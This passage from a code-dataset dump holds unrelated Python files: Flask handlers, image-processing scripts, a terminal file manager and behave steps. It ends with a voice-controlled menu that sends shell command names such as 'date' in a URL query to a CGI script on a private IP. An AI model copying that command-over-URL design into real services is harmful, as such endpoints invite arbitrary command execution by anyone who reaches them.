repr(fname) + \" does not appear to \"\n + \"be BED, interval list, or 'chr:start-end' \"\n + \"text!\\nFirst non-blank line: \" + repr(line))\n","sub_path":"cnvlib/tabio/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"50462441","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 26 de abr de 2018\n\n@author: koliveirab\n'''\nfrom behave import *\nfrom time import sleep\n\n@given(\"Inserimos o valor {primeiro}\")\ndef inserir_valor(context,primeiro):\n sleep(2)\n context.calc.clica(\"1\",\"name\")\n sleep(2)\n context.calc.clica(primeiro,tipo=\"name\")\n \n \n@when(\"quando temos a {operador} do primeiro com {segundo}\")\ndef operamos(context,operador,segundo):\n elemento=context.operador.operador(operador)\n context.calc.clica(elemento,\"name\")\n context.calc.clica(segundo,\"name\")\n \n@then(\"teremos o resultado:{resultado}\")\ndef resultado(context,resultado):\n context.calc.clica(\"=\",tipo=\"name\")\n resultados=context.calc.pegar_texto(\"CalcText\",\"id\")\n result=context.asserts.verifica_valor(resultados,resultado)\n \n \n@given(\"Zeramos o nosso contador\")\n@when(\"Inserimos o primeiro valor\")\n@when(\"Somamos o segundo Valor\")\n@then(\"Temos o valór de :\")\n@then(\"e diferente de zero\")\ndef step(context):\n pass","sub_path":"steps/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"274071202","text":"\n\n#######\n\"\"\"\nNa dwóch listach z plików 'meetup_list.csv' i 'meetup_list2.csv' występują powtórki.\nPotrzebujemy mieć jedną, spójną listę, posortowaną alfabetycznie dla sprawnego przeprowadzenia rejestracji.\nZaczytaj dane, wyrzuć powtórki, skompiluj w jedną listę i wypisz.\n\"\"\"\n\n#######\n\nfacebook_list = 'data/meetup_list.csv'\nmeetup_list = 'data/meetup_list2.csv'\n\n","sub_path":"meetup_list_compilation.py","file_name":"meetup_list_compilation.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"177596509","text":"from flask import jsonify\n\nfrom dao.resource import ResourcesDAO\n\n\nclass ResourceHandler:\n def build_resource_dict(self, row):\n result = {}\n result['rid'] = row[0]\n result['sid'] = row[1]\n result['rname'] = row[2]\n result['cost'] = row[3]\n result['resAmount'] = row[4]\n result['buyable'] = row[5]\n result['location'] = row[6]\n\n\n\n return result\n\n def build_supplier_dict(self, row):\n result = {}\n result['sid'] = row[0]\n result['sname'] = row[1]\n result['sphone'] = row[5]\n result['scity'] = row[6]\n\n return result\n\n def build_resource_attributes(self, rid, sid, rname, cost, resv_amount):\n result = {}\n result['rid'] = rid\n result['sid'] = sid\n result['cost'] = rname\n result['rname'] = cost\n result['resv_amount'] = resv_amount\n return result\n\n def getAllResources(self):\n dao = ResourcesDAO()\n resources_list = dao.getAllResources()\n result_list = []\n for row in resources_list:\n result = self.build_resource_dict(row)\n result_list.append(result)\n return jsonify(Resources=result_list)\n\n def getResourceById(self, rid):\n dao = ResourcesDAO()\n row = dao.getResourcesById(rid)\n if not row:\n return jsonify(Error=\"Resource Not Found\"), 404\n else:\n resource = self.build_resource_dict(row)\n return jsonify(Resource=resource)\n\n def searchResources(self, args): #Fixed\n name 
= args.get(\"name\")\n cost = args.get(\"cost\")\n dao = ResourcesDAO()\n resources_list = []\n if (len(args) == 2) and name and cost:\n resources_list = dao.getResourcesByNameAndCost(name, cost)\n elif (len(args) == 1) and name:\n resources_list = dao.getResourcesByName(name)\n elif (len(args) == 1) and cost:\n resources_list = dao.getResourcesByCost(cost)\n else:\n return jsonify(Error=\"Malformed query string\"), 400\n result_list = []\n for row in resources_list:\n result = self.build_resource_dict(row)\n result_list.append(result)\n return jsonify(Resources=result_list)\n\n def getSuppliersByResourceId(self, rid):\n dao = ResourcesDAO()\n if not dao.getResourceById(rid):\n return jsonify(Error=\"Resource Not Found\"), 404\n suppliers_list = dao.getSuppliersByResourceId(rid)\n result_list = []\n for row in suppliers_list:\n result = self.build_supplier_dict(row)\n result_list.append(result)\n return jsonify(Suppliers=result_list)\n\n def insertResourcesJson(self, form):\n print(\"form: \", form)\n if len(form) != 4:\n return jsonify(Error=\"Malformed post request\"), 400\n else:\n sid = form['sid']\n resv_amount = form['resv_amount']\n cost = form['cost']\n rname = form['rname']\n if rname and resv_amount and cost and sid:\n dao = ResourcesDAO()\n rid = dao.insert(sid, rname, cost, resv_amount)\n result = self.build_resource_attributes(rid, sid, rname, cost, resv_amount)\n return jsonify(Resource=result), 201\n else:\n return jsonify(Error=\"Unexpected attributes in post request\"), 400\n\n def insertResourceBySupplierIdJson(self,rid, json):\n sid = json['sid']\n resv_amount = json['resv_amount']\n cost = json['cost']\n rname = json['rname']\n if rname and resv_amount and cost and sid:\n dao = ResourcesDAO()\n r = dao.insert(rid,sid, rname, cost, resv_amount)\n if r:\n result = self.build_resource_attributes(rid, sid, rname, cost, resv_amount)\n return jsonify(Resource=result), 201\n else:\n return jsonify(Error=\"Resource not found or invalid supplier id.\"), 404\n else:\n return jsonify(Error=\"Unexpected attributes in post request\"), 400\n\n def deleteResource(self, rid):\n dao = ResourcesDAO()\n if not dao.getResourceById(rid):\n return jsonify(Error=\"Resource not found.\"), 404\n else:\n dao.delete(rid)\n return jsonify(DeleteStatus=\"OK\"), 200\n\n def updateResource(self, rid, form):\n dao = ResourcesDAO()\n if not dao.getResourceById(rid):\n return jsonify(Error=\"Resource not found.\"), 404\n else:\n if len(form) != 4:\n return jsonify(Error=\"Malformed update request\"), 400\n else:\n sid = form['sid']\n resv_amount = form['resv_amount']\n cost = form['cost']\n rname = form['rname']\n if rname and resv_amount and cost and sid:\n dao.update(rid, sid, rname, cost, resv_amount)\n result = self.build_resource_attributes(rid, sid, rname, cost, resv_amount)\n return jsonify(Resource=result), 200\n else:\n return jsonify(Error=\"Unexpected attributes in update request\"), 400\n\n def build_resource_counts(self, resource_counts):\n result = []\n # print(resource_counts)\n for P in resource_counts:\n D = {}\n D['id'] = P[0]\n D['name'] = P[1]\n D['count'] = P[2]\n result.append(D)\n return result\n\n def getCountByResourceId(self):\n dao = ResourcesDAO()\n result = dao.getCountByResourceId()\n # print(self.build_resource_counts(result))\n return jsonify(ResourceCounts=self.build_resource_counts(result)), 
200\n","sub_path":"handler/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"49300448","text":"# Program to find smears on camera lens by averaging multiple photo's worth of\n# pixel values and using thresholding techniques in openCV\n\n# Use by going to directory which holds \"sample_drive\" and entering which\n# camera to use. (0-3, 5) as the second argument.\n\nimport sys\nimport numpy as np\nimport cv2\nimport os\n\ndef find_mean_img(file_list):\n # parameter for number of photos to test\n test_size = 301\n\n # create a matrix to store the pixel values after resize\n mean_matrix = np.zeros((1000,1000,3),np.float)\n\n # reseize each image and store pixel value\n print('Processing...')\n image_count = 0;\n while image_count < len(file_list):\n img = cv2.imread(photo_dir_path+file_list[image_count])\n img = cv2.resize(img,(1000,1000))\n img = cv2.GaussianBlur(img,(5,5),0)\n img_matrix = np.array(img, dtype=np.float)\n mean_matrix += img_matrix\n image_count += (len(file_list) / test_size)\n\n # find avg pixel values\n mean_matrix = mean_matrix / (test_size)\n mean_matrix = np.array(np.round(mean_matrix),dtype=np.uint8)\n\n cv2.imwrite('cam_'+str(cam)+\"_mean.jpg\",mean_matrix)\n return mean_matrix\n\ndef create_mask(mean_img):\n # cv2.adaptiveThreshold parameters\n thresh_block_size = 101\n subtracted_constant = 6\n\n # Convert mean image to grayscale\n gray = cv2.cvtColor(mean_img,cv2.COLOR_BGR2GRAY)\n mean_matrix = np.array(np.round(gray),dtype=np.uint8)\n\n # Binarize image with adaptiveThreshold\n mean_thresh = cv2.adaptiveThreshold(mean_matrix,255,\\\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV,\\\n thresh_block_size, subtracted_constant)\n\n return mean_thresh\n\ndef show_smudge(mask_img):\n # contour size limits\n min_cnt_area = 500\n max_cnt_area = 3000\n\n # Pull random image\n rand_number = np.random.randint(low=0, high=len(file_list))\n rand_img = cv2.imread(photo_dir_path+file_list[rand_number])\n rand_img = cv2.resize(rand_img,(1000,1000))\n\n # find the contours on the mask and check for appropriate size\n _,contours,hierarchy = cv2.findContours(mask_img, cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n # print(hierarchy[0])\n cnt_count = 0\n for cnt in contours:\n area = cv2.contourArea(cnt)\n # print(area)\n if area > min_cnt_area and area < max_cnt_area:\n # draw smudge on random image\n rand_img = cv2.drawContours(rand_img,cnt,-1,(0,255,0),3)\n cv2.imwrite('cam_'+str(cam)+\"_found.jpg\",rand_img)\n cnt_count += 1\n if cnt_count == 0:\n print(\"No Smudge Found\")\n else:\n print(\"Found Smudge\")\n\n\nif __name__ == \"__main__\":\n # check for correct number of arguments\n if len(sys.argv) != 2:\n print('Enter which camera to use. (0-3, 5) as second argument.')\n sys.exit()\n cam = int(sys.argv[1])\n if not cam in (0,1,2,3,5):\n print('Enter which camera to use. 
(0-3, 5) as second argument.')\n sys.exit()\n\n # Make a list of photo names\n photo_dir_path = \"sample_drive/cam_\" + str(cam) + \"/\"\n file_list = os.listdir(photo_dir_path)\n\n mean_image = find_mean_img(file_list)\n mask = create_mask(mean_image)\n cv2.imwrite('cam_'+str(cam)+\"_mask.jpg\",mask)\n show_smudge(mask)\n","sub_path":"smear_detector.py","file_name":"smear_detector.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"88240552","text":"# https://leetcode.com/problems/sort-colors/discuss/\ndef dutch_flag(pivot_index, A):\n\tpivot = A[pivot_index]\n\tsmaller = 0\n\tfor i in range(len(A)):\n\t\tif A[i] < pivot:\n\t\t\tA[i], A[smaller] = A[smaller], A[i]\n\t\t\tsmaller += 1\n\tlarger = len(A) - 1\n\tfor j in reversed(range(len(A))):\n\t\tif A[j] > pivot:\n\t\t\tA[j],A[larger] = A[larger], A[j]\n\t\t\tlarger -=1\n\treturn A\ntest = [3,5,8,4,0,10,1,2,11]\nprint (dutch_flag(3,test))","sub_path":"leetcode/dutch_flag.py","file_name":"dutch_flag.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"254711570","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 2 13:52:28 2020\n\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 23 17:53:02 2020\n\n@author: Rasheed el-Bouri\n\"\"\"\nfrom scipy.stats import wasserstein_distance\nimport numpy as np\nimport pandas as pd\n\n\n\nclass curriculum():\n \n def __init__(self, dataframe):\n self.dataframe = dataframe\n \n def getMahalanobis(self):\n\n dataframe = pd.DataFrame(self.dataframe)\n dataframe = dataframe.reset_index(drop=True)\n nunique = dataframe.apply(pd.Series.nunique)\n if dataframe.shape[1] >= 15:\n cols_to_drop = nunique[nunique <= 2].index\n dataframe = dataframe.drop(cols_to_drop, axis=1) \n \n features = list(dataframe)\n means = pd.DataFrame(np.zeros(len(features)))\n covariance = np.cov(dataframe.T)\n inv_cov = np.linalg.inv(covariance)\n Mahalanobis = np.zeros(len(dataframe))\n \n for j in range(0,len(means)):\n means[0][j] = np.mean(dataframe.iloc[:,j])\n \n means = means.reset_index(drop=True)\n \n for i in range(0,len(dataframe)):\n first = pd.DataFrame(dataframe.iloc[i,:]).reset_index(drop=True) \n \n V = first[i]-means[0]\n Mahalanobis[i] = np.sqrt(np.abs(np.dot(np.dot(V.T,inv_cov), V)))#[0][0]\n \n \n return(pd.DataFrame(Mahalanobis))\n \n \n \n def getCosine(self):\n \n dataframe = self.dataframe.reset_index(drop=True)\n \n features = list(dataframe)\n means = pd.DataFrame(np.zeros(len(features)))\n \n for j in range(0,len(means)):\n means[0][j] = np.mean(dataframe.iloc[:,j])\n \n l=[]\n for i in range(0, len(dataframe)):\n l.append(np.arccos(np.dot(np.array(dataframe[i:i+1]),np.array(means))/(np.linalg.norm(np.array(dataframe[i:i+1]))*np.linalg.norm(np.array(means))))[0])\n \n return(pd.DataFrame(np.array(l)))\n \n \n \n def getWasserstein(self):\n \n dataframe = self.dataframe.reset_index(drop=True)\n \n uniform = (1/dataframe.shape[1])*np.ones(dataframe.shape[1])\n \n l = []\n for i in range(0,len(dataframe)):\n l.append(wasserstein_distance(uniform, np.array(dataframe[i:i+1])[0]))\n \n return(pd.DataFrame(np.array(l)))\n \n \n","sub_path":"curricula/curricula.py","file_name":"curricula.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
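# A minimal usage sketch for the `curriculum` class above, assuming the class is
# importable in this scope. The toy DataFrame (its shape, values, and seed) is
# hypothetical; getMahalanobis() additionally assumes enough rows for an
# invertible covariance matrix.
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
toy_df = pd.DataFrame(rng.normal(size=(100, 4)))  # 100 samples, 4 features

cur = curriculum(toy_df)
maha = cur.getMahalanobis()   # per-sample Mahalanobis distance to the feature mean
wass = cur.getWasserstein()   # per-sample Wasserstein distance to a uniform vector
easy_to_hard = maha[0].sort_values().index  # schedule: train on closest samples first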
+{"seq_id":"364377376","text":"#\n# created by\n# Antonio Garcia-Uceda Juarez\n# PhD student\n# Medical Informatics\n#\n# created on 09/02/2018\n# Last update: 09/02/2018\n########################################################################################\n\nfrom CommonUtil.Constants import *\nfrom CommonUtil.ErrorMessages import *\nfrom CommonUtil.FileReaders import *\nfrom CommonUtil.FunctionsUtil import *\nfrom CommonUtil.PlotsManager import *\nfrom CommonUtil.WorkDirsManager import *\nfrom Networks.Metrics import *\nfrom Preprocessing.OperationsImages import *\nfrom collections import OrderedDict\nimport argparse\n\n\ndef main(args):\n\n # ---------- SETTINGS ----------\n nameInputMasksRelPath = 'ProcMasks'\n nameTracheaMasksRelPath = 'ProcAllMasks'\n\n # Get the file list:\n namePredictionsFiles = 'predict_probmaps*.nii.gz'\n nameInputMasksFiles = '*outerwall.nii.gz'\n nameTracheaMasksFiles = '*_trachea.nii.gz'\n\n # template search files\n tempSearchInputFiles = 'av[0-9]*'\n\n if (args.calcMasksThresholding):\n suffixPostProcessThreshold = '_thres%s'%(str(args.thresholdValue).replace('.','-'))\n if (args.attachTracheaToCalcMasks):\n suffixPostProcessThreshold += '_withtrachea'\n else:\n suffixPostProcessThreshold = ''\n\n # create file to save accuracy measures on test sets\n nameAccuracyPredictFiles = 'predict_accuracy_tests%s.txt'%(suffixPostProcessThreshold)\n\n def update_name_outfile(in_name, in_acc):\n pattern_accval = getExtractSubstringPattern(in_name, 'acc[0-9]*')\n new_accval_int = np.round(100*in_acc)\n out_name = filenamenoextension(in_name).replace('predict_probmaps','predict_binmasks').replace(pattern_accval, 'acc%2.0f'%(new_accval_int))\n return out_name + '%s.nii.gz'%(suffixPostProcessThreshold)\n\n tempOutPredictMasksFilename = update_name_outfile\n # ---------- SETTINGS ----------\n\n\n workDirsManager = WorkDirsManager(args.basedir)\n BaseDataPath = workDirsManager.getNameBaseDataPath()\n InputPredictDataPath = workDirsManager.getNameExistPath(args.basedir, args.predictionsdir)\n InputMasksPath = workDirsManager.getNameExistPath(BaseDataPath, nameInputMasksRelPath)\n OutputPredictMasksPath= workDirsManager.getNameNewPath (args.basedir, args.predictionsdir)\n\n listPredictionsFiles = findFilesDir(InputPredictDataPath, namePredictionsFiles)\n listGrndTruthMasksFiles = findFilesDir(InputMasksPath, nameInputMasksFiles)\n\n nbPredictionsFiles = len(listPredictionsFiles)\n nbGrndTruthMasksFiles = len(listGrndTruthMasksFiles)\n\n # Run checkers\n if (nbPredictionsFiles == 0):\n message = \"0 Predictions found in dir \\'%s\\'\" %(InputPredictDataPath)\n CatchErrorException(message)\n if (nbGrndTruthMasksFiles == 0):\n message = \"0 Ground-truth Masks found in dir \\'%s\\'\" %(InputMasksPath)\n CatchErrorException(message)\n\n\n if (args.calcMasksThresholding and args.attachTracheaToCalcMasks):\n\n TracheaMasksPath = workDirsManager.getNameExistPath(BaseDataPath, nameTracheaMasksRelPath)\n\n listTracheaMasksFiles = findFilesDir(TracheaMasksPath, nameTracheaMasksFiles)\n\n nbTracheaMasksFiles = len(listTracheaMasksFiles)\n\n if (nbGrndTruthMasksFiles != nbTracheaMasksFiles):\n message = \"num Ground-truth Masks %i not equal to num Trachea Masks %i\" %(nbGrndTruthMasksFiles, nbTracheaMasksFiles)\n CatchErrorException(message)\n\n\n computePredictAccuracy = DICTAVAILMETRICFUNS(args.predictAccuracyMetrics, use_in_Keras=False)\n\n listFuns_Metrics = {imetrics: DICTAVAILMETRICFUNS(imetrics, use_in_Keras=False) for imetrics in args.listPostprocessMetrics}\n 
out_predictAccuracyFilename = joinpathnames(InputPredictDataPath, nameAccuracyPredictFiles)\n fout = open(out_predictAccuracyFilename, 'w')\n\n strheader = '/case/ ' + ' '.join(['/%s/' % (key) for (key, _) in listFuns_Metrics.iteritems()]) + '\\n'\n fout.write(strheader)\n\n\n\n for i, predict_probmaps_file in enumerate(listPredictionsFiles):\n\n print('\\'%s\\'...' %(predict_probmaps_file))\n\n name_prefix_case = getExtractSubstringPattern(basename(predict_probmaps_file),\n tempSearchInputFiles)\n\n for iterfile in listGrndTruthMasksFiles:\n if name_prefix_case in iterfile:\n grndtruth_masks_file = iterfile\n #endfor\n print(\"assigned to '%s'...\" %(basename(grndtruth_masks_file)))\n\n\n predict_probmaps_array = FileReader.getImageArray(predict_probmaps_file)\n grndtruth_masks_array = FileReader.getImageArray(grndtruth_masks_file)\n\n print(\"Predictions masks array of size: %s...\" % (str(predict_probmaps_array.shape)))\n\n\n if (args.calcMasksThresholding):\n print(\"Threshold probability maps to compute binary masks with threshold value %s...\" % (args.thresholdValue))\n\n predict_masks_array = ThresholdImages.compute(predict_probmaps_array, args.thresholdValue)\n\n if (args.attachTracheaToCalcMasks):\n print(\"IMPORTANT: Attach masks of Trachea to computed prediction masks...\")\n\n for iterfile in listTracheaMasksFiles:\n if name_prefix_case in iterfile:\n trachea_masks_file = iterfile\n # endfor\n print(\"assigned to: '%s'...\" % (basename(trachea_masks_file)))\n\n trachea_masks_array = FileReader.getImageArray(trachea_masks_file)\n\n predict_masks_array = OperationsBinaryMasks.join_two_binmasks_one_image(predict_masks_array, trachea_masks_array)\n grndtruth_masks_array = OperationsBinaryMasks.join_two_binmasks_one_image(grndtruth_masks_array, trachea_masks_array)\n\n\n\n accuracy = computePredictAccuracy(grndtruth_masks_array, predict_masks_array)\n\n list_predictAccuracy = OrderedDict()\n\n for (key, value) in listFuns_Metrics.iteritems():\n acc_value = value(grndtruth_masks_array, predict_masks_array)\n list_predictAccuracy[key] = acc_value\n # endfor\n\n\n # print list accuracies on screen\n for (key, value) in list_predictAccuracy.iteritems():\n print(\"Computed '%s': %s...\" %(key, value))\n #endfor\n\n # print list accuracies in file\n strdata = '\\'%s\\''%(name_prefix_case) + ' ' + ' '.join([str(value) for (_,value) in list_predictAccuracy.iteritems()]) +'\\n'\n fout.write(strdata)\n\n\n # Save thresholded final prediction masks\n if (args.calcMasksThresholding and args.saveThresholdImages):\n print(\"Saving prediction thresholded binary masks, with dims: %s...\" %(tuple2str(predict_masks_array.shape)))\n\n out_predictMasksFilename = joinpathnames(OutputPredictMasksPath, tempOutPredictMasksFilename(predict_probmaps_file, accuracy))\n\n FileReader.writeImageArray(out_predictMasksFilename, predict_masks_array)\n #endfor\n\n #close list accuracies file\n fout.close()\n\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--basedir', default=BASEDIR)\n parser.add_argument('--predictionsdir', default='Predictions_NEW')\n parser.add_argument('--predictAccuracyMetrics', default=PREDICTACCURACYMETRICS)\n parser.add_argument('--listPostprocessMetrics', type=parseListarg, default=LISTPOSTPROCESSMETRICS)\n parser.add_argument('--calcMasksThresholding', type=str2bool, default=CALCMASKSTHRESHOLDING)\n parser.add_argument('--thresholdValue', type=float, default=THRESHOLDVALUE)\n parser.add_argument('--attachTracheaToCalcMasks', type=str2bool, 
default=ATTACHTRAQUEATOCALCMASKS)\n parser.add_argument('--saveThresholdImages', type=str2bool, default=SAVETHRESHOLDIMAGES)\n args = parser.parse_args()\n\n print(\"Print input arguments...\")\n for key, value in vars(args).iteritems():\n print(\"\\'%s\\' = %s\" %(key, value))\n\n main(args)","sub_path":"PostprocessImagesData.py","file_name":"PostprocessImagesData.py","file_ext":"py","file_size_in_byte":7938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"307077495","text":"import Utils\nimport os, os.path\nimport shutil\nimport functools\nimport stat\nimport re\n\ndef report_progress(app, filename, copied, total):\n app.UI.msg(\"%s %s/%s %.2f%%\" % (filename, Utils.csize(copied),\n Utils.csize(total), (copied/total)*100), delay = 0)\n\ndef report_progress_and_copy(app):\n def copy_function(src, dst):\n Utils.copyfile(src, dst, functools.partial(report_progress, app, dst))\n return copy_function\n\nclass Dentry:\n def isdir(self):\n return self.dirp\n\n def csize(self):\n return Utils.csize(self.size)\n\n def __init__(self, d, name):\n self.dir = d\n self.name = name\n try:\n self.dirp = Utils.isdir(Utils.npath(self.dir.path(), self.name))\n self.size = os.stat(self.path()).st_size\n except FileNotFoundError:\n self.dirp = False\n self.size = 0\n\n def __str__(self):\n return self.name\n\n def cname(self):\n return Utils.printable(str(self))\n\n def __eq__(self, other):\n return self.name == other.name and self.dir == other.dir\n\n def path(self):\n return Utils.npath(self.dir.path(), self.name)\n\nclass Dir:\n def gettab(self):\n return self.tab\n\n def getapp(self):\n return self.tab.getapp()\n\n def sel(self):\n fs = self.__num_to_files(self.selected)\n qf = [self.getapp().config[\"shell_quote\"] + f + self.getapp().config[\"shell_quote\"] for f in fs]\n return self.getapp().config[\"filesep\"].join(qf)\n\n def curf(self):\n if self.dents:\n return self.getapp().config[\"shell_quote\"] + self.dents[self.cur].path() + self.getapp().config[\"shell_quote\"]\n else:\n return ''\n\n def create(tab, path = ''):\n\n if path == '': # Must return a Dir object\n if os.path.exists(os.environ[\"HOME\"]):\n d = Dir(tab, os.environ[\"HOME\"])\n else:\n d = Dir(tab, \"/\")\n return d\n\n if not os.path.exists(path):\n return None\n d = Dir(tab, path)\n return d\n\n def __init__(self, tab, path):\n self.tab = tab\n self.root = Utils.rpath(path)\n self.dents = []\n for f in Utils.listdir(path, self.getapp().config[\"show_hidden\"]):\n self.dents.append(Dentry(self, f))\n self.dents = sorted(self.dents, key = self.getapp().config[\"sortkey\"])\n self.n = len(self.dents)\n self.cur = min(0, self.n - 1)\n self.selected = set([])\n self.search_pat = ''\n self.search_results = []\n self.search_cur = 0\n self.pad = None\n\n def dentry(self):\n return self.dents[self.cur]\n \n def __is_selected(self, n):\n return n in self.selected\n\n def __open_files(self, lof):\n for f in lof:\n pass\n\n # WARNING: A reload operation destroys the following\n # 1) The list of selected files in the directory.\n # 2) The current 'search' status in the directory.\n def reload(self):\n # Reload list of files from disk\n self.dents = []\n for f in Utils.listdir(self.root, self.getapp().config[\"show_hidden\"]):\n self.dents.append(Dentry(self, f))\n self.dents = sorted(self.dents, key = self.getapp().config[\"sortkey\"])\n self.n = len(self.dents)\n if self.n == 0: self.cur = -1\n else: self.cur = max(min(self.cur, self.n - 1), 0) # Keep cursor as close as possible.\n 
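        # Reset per-directory UI state on reload; the TODOs below track carrying selection and search results across a reload.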
self.selected = set([]) # TODO: Preserve selected files\n self.search_pat = '' # TODO: Reload search data\n self.search_cur = 0\n self.search_results = []\n self.winexit()\n self.wininit()\n \n ## Motion commands\n\n def next(self, count = 1):\n oldcur = self.cur\n self.cur = (self.cur + count) % self.n\n self.update([self.cur, oldcur])\n\n def prev(self, count = 1):\n oldcur = self.cur\n self.cur = (self.cur - count) % self.n\n self.update([self.cur, oldcur])\n\n def goto_line(self, lineno = 0):\n oldcur = self.cur\n self.cur = (lineno - 1) % self.n\n self.update([self.cur, oldcur])\n\n def search(self, pat):\n if self.getapp().config[\"search_case_insensitive\"]:\n re_flags = re.I\n else:\n re_flags = 0\n res = []\n for i, s in enumerate(map(lambda x: x.cname(), self.dents)):\n if re.search(pat, s, re_flags):\n res.append(i)\n self.search_pat = pat\n old_search = self.search_results\n self.search_results = res\n self.search_cur = 0\n oldcur = self.cur\n if self.search_results:\n self.cur = self.search_results[self.search_cur]\n self.update([self.cur, oldcur] + self.search_results + old_search)\n\n def search_next(self, count = 1):\n if self.search_results:\n oldcur = self.cur\n self.search_cur = (self.search_cur + count) % len(self.search_results)\n self.cur = self.search_results[self.search_cur]\n self.update([self.cur, oldcur])\n\n def search_prev(self, count = 1):\n if self.search_results:\n oldcur = self.cur\n self.search_cur = (self.search_cur - count) % len(self.search_results)\n self.cur = self.search_results[self.search_cur]\n self.update([self.cur, oldcur])\n\n ## Operator commands\n\n def __get_motion_range(self, motion):\n start = self.cur\n motion()\n end = self.cur\n return range(min(start, end), max(start, end) + 1)\n\n def select(self, motion = None, search = False):\n if motion:\n new = self.__get_motion_range(motion)\n self.selected = self.selected.union(new)\n elif search:\n new = self.search_results\n self.selected = self.selected.union(new)\n self.update(new)\n\n def deselect(self, motion = None, search = False):\n if motion:\n new = self.__get_motion_range(motion)\n self.selected = self.selected.difference(new)\n elif search:\n new = self.search_results\n self.selected = self.selected.difference(new)\n self.update(new)\n\n def __num_to_files(self, lon):\n return [self.dents[i].path() for i in lon]\n\n def yank(self, motion = None, reg = '0', select = None, search = False):\n if select:\n self.getapp().Registers[reg] = self.__num_to_files(self.selected)\n elif motion:\n self.getapp().Registers[reg] = self.__num_to_files(self.__get_motion_range(motion))\n elif search:\n self.getapp().Registers[reg] = self.__num_to_files(self.search_results)\n\n def append(self, motion = None, reg = '0', select = False, search = False):\n if select:\n self.getapp().Registers[reg].extend(self.__num_to_files(self.selected))\n elif motion:\n self.getapp().Registers[reg].extend(self.__num_to_files(self.__get_motion_range(motion)))\n elif search:\n self.getapp().Registers[reg].extend(self.__num_to_files(self.search_results))\n\n # Put files\n def put(self, reg = '0'):\n for path in self.getapp().Registers[reg]:\n dst = self.path() + os.sep + os.path.basename(path)\n if os.path.isdir(path):\n shutil.copytree(path, dst, copy_function = report_progress_and_copy(self.getapp()))\n else:\n copy_func = report_progress_and_copy(self.getapp())\n copy_func(path, dst)\n self.reload()\n\n def open_terminal(self):\n cur_save = os.path.abspath(os.curdir)\n os.chdir(self.path())\n 
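        # Launch the configured terminal emulator from this directory, then restore the previous working directory.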
Utils.spawn(self.getapp().config[\"terminal\"],\n [self.getapp().config[\"terminal\"]] + self.getapp().config[\"terminal_args\"])\n os.chdir(cur_save)\n\n # Delete files\n def delete(self, motion = None, select = False, reg = None, search = False):\n if motion:\n Utils.delete_files(self.__num_to_files(self.__get_motion_range(motion)))\n elif select:\n Utils.delete_files(self.__num_to_files(self.selected))\n elif reg:\n Utils.delete_files(self.getapp().Registers[reg])\n elif search:\n Utils.delete_files(self.__num_to_files(self.search_results))\n self.reload()\n\n def view(self, motion = None, select = False, reg = None, search = False):\n if motion:\n Utils.view_files(self.__num_to_files(self.__get_motion_range(motion)))\n elif select:\n Utils.view_files(self.__num_to_files(self.selected))\n elif search:\n Utils.view_files(self.__num_to_files(self.search_results))\n elif reg:\n Utils.view_files(self.getapp().Registers[reg])\n\n def new_dir(self, name):\n os.makedirs(name)\n self.reload()\n\n def path(self):\n return self.root\n\n def exists(self):\n return os.path.exists(self.root)\n\n def cname(self):\n return os.path.basename(self.root)\n\n def update(self, lines):\n self.getapp().UI.dirupdate(self, lines)\n \n def wininit(self):\n self.getapp().UI.dirinit(self)\n self.update(range(0, self.n))\n\n def winexit(self):\n self.getapp().UI.direxit(self)\n","sub_path":"Dir.py","file_name":"Dir.py","file_ext":"py","file_size_in_byte":9256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"560307278","text":"#from django.contrib.sessions.middleware import SessionMiddleware\n\nfrom django.conf import settings\nfrom calc.models import Result\n\n\ndef cutter_context(request):\n context_data = dict()\n context_data['results_count'] = request.results_count = int(\n Result.objects.all().count() + settings.CUTTER_FAKE_RESULTS_NUMBER)\n return context_data\n","sub_path":"cutter/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"450250028","text":"import webbrowser\nimport speech_recognition as sr\nimport pyttsx3\nprint(\"welcome to my tools\\n\\n\")\npyttsx3.speak(\"welcome to my tools\")\n\nwhile 1 :\n\tprint(\"Enter your requirements.......we r listening.....\", end='')\t\n\tpyttsx3.speak(\"Enter your requirements.......we r listening.....\")\n\t#ch=input()\n\tr = sr.Recognizer()\n\twith sr.Microphone() as source :\n \t\tprint('start saying......')\n \t\tpyttsx3.speak('start saying......')\n \t\taudio =r.listen(source)\n \t\tprint('we got it,plz wait.....')\n \t\tpyttsx3.speak('we got it,plz wait.....')\n\tch=r.recognize_google(audio)\n\tif ('date'in ch)and ('run' in ch) or ('execute' in ch): \n\t\tpyttsx3.speak(\"Running the date command\")\t\t\t\n\t\twebbrowser.open(\"http://192.168.43.229/cgi-bin/iiec.py?x=date&p=\") \n\t\tinput()\n\telif ('calender' in ch) and ('run' in ch)or 